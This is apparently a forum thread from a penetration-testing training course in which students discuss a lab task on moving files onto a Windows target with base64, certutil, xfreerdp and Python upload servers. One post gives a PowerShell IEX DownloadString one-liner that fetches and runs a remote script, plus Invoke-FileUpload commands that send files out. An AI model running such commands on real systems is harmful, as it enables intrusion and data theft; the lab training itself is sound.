FILE TRANSFERS - Windows File Transfer Methods

Hello

I’ve just completed the first task on the file ‘transfers modules’ titled ‘Windows File Transfer Methods’. Whilst i got through it, I think I might have missed the point on the second challenge so I’d be grateful for any feedback. The second challenge reads:

Upload the attached file named upload_win.zip to the target using the method of your choice. Once uploaded, RDP to the box, unzip the archive, and run “hasher upload_win.txt” from the command line. Submit the generated hash as your answer.

I completed it by hosting a server on my Linux machine then RDP’ing onto the target windows box and downloading ‘upload_win.zip’ onto the box. (The remaining unzipping and hashing part of the challenge was straightforward).

However, the question implies I should have uploaded the file to the target box first and THEN RDP’ed to the box. I just could not find a method to upload a file onto the box without first RDP’ing onto it.

Did I miss the point? Is there a way to upload the file before RDP’ing onto the box?

Thanks for any feedback in advance.

John

Hi @johneverist,
did you receive any reply to your question ?

I’m facing the same doubt here. I transfered the file simply via RDP - however I believe I might be missing here on something.

Thanks for clarifying.

Carlo

I just found a solution for us, you can’t upload files to the windows virtual machine in the usual way but we can indirectly upload the upload_win.zip file to the windows server, what you need to do is:

  1. encode the file upload_win.zip with the system you used to upload it using base64
  2. copy the base64 string you just got and use the following command at the parrot-htb virtual machine to get the original .zip file:
    echo <base64_value> | base64 -d -w 0 > upload_win.zip
    3)you run http server service at parrot virtual machine
    4)RDP to the window virtual machine and download the file upload_win.zip from the parrot virtual machine by the command in module
    ===> you got it

That was a good idea, another option would be to:

1-Go to a site like this File to Base64 Converter - Encode Files to Base64 - Online - Browserling Web Developer Tools to encode the file and copy the string.
2-Go RDP to the Windows machine using xfreerdp /u:htb-student /size:50%h /v:IP_Address
3-Create a new text file upload.txt and paste the string.
4-user certutil -decode upload.txt upload.zip
5-unzip upload.zip
6-run hasher upload_win.txt

1 Like

Well, I guess the question is poorly worded then, it doesn’t seem possible to send a file to a system you do not control.
Everyone seems to RDP into the machine first and only then download the file.

1 Like

Good afternoon from Spain! After typing the xfreerdp command I get “No protocol specified” error… Any hints? I have tried several things :frowning:

try using flags to customize your login attempt

hint: think of different ways you’re able to run commands on a windows server.

I had that issue as well until I ran the scenario from my own VM.

So, what I did is i went to https://www.base64encode.org/ in order to encode the file. Once when you got the file on the Windows Machine run following command → certutil -decode input.txt output.txt.Replace “input.txt” with the name of the Base64-encoded file you want to decode, and replace “output.txt” with the name of the file you want to save the decoded content to. Then, by following the guidelines from the problem text we can use following command hasher output.txt. The string we got should be the answer.

hint: the file HAVE TO BE the downloaded one (from htb site), not a new copy and paste version

This would be great if the hasher command actually worked. Powershell keeps saying that the command is not found

What error are you getting? Can you post the command and output?

try windows command prompt

1 Like

“Upload the attached file named upload_win.zip to the target” How is what ur doing remotely close to this?

“User does not have permission to read the file.” when attempting to use hasher on the moved folder.

Hey all, first time poster looking for some help with the second question of this task. I’m using the Pwnbox.

I’m trying to use Powershell Web uploads to upload the file to the remote machine.

I installed and uploaded my server

pip3 install uploadserver
Collecting uploadserver
Downloading uploadserver-5.2.0-py3-none-any.whl (19 kB)
Installing collected packages: uploadserver
Successfully installed uploadserver-5.2.0

python3 -m uploadserver
File upload available at /upload
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

I then invoked PSUpload

PS C:\htb> IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')

But when trying to invoke the file upload it keeps saying it can’t find the path.
Cannot find path '/root/=/htb-5zs1qsp2jf/desktop/upload_win.txt' because it does not exist.
The file is on my desktop.
I have tried all of the below.


Invoke-FileUpload -Uri http://10.129.117.126:8000/upload -File \desktop\upload_win.tx
Invoke-FileUpload -Uri http://10.129.117.126:8000/upload -File c:\htb-ac-1074504\desktop\upload_win.txt
Invoke-FileUpload -Uri http://10.129.117.126:8000/upload -File htb-ac-1074504\desktop\upload_win.txt
Invoke-FileUpload -Uri http://10.129.117.126:8000/upload -File \htb-ac-1074504\desktop\upload_win.txt
Invoke-FileUpload -Uri http://10.129.117.126:8000/upload -File root\desktop\upload_win.txt
Invoke-FileUpload -Uri http://10.129.117.126:8000/upload -File home\htb-ac-1074504\desktop\upload_win.txt
Invoke-FileUpload -Uri http://10.129.117.126:8000/upload -File =\htb-5zs1qsp2jf\desktop\upload_win.txt

Is anyone able to help me with where to put the file so it is in the right path for the upload? (and any other tips / assitance welcome!)

Thanks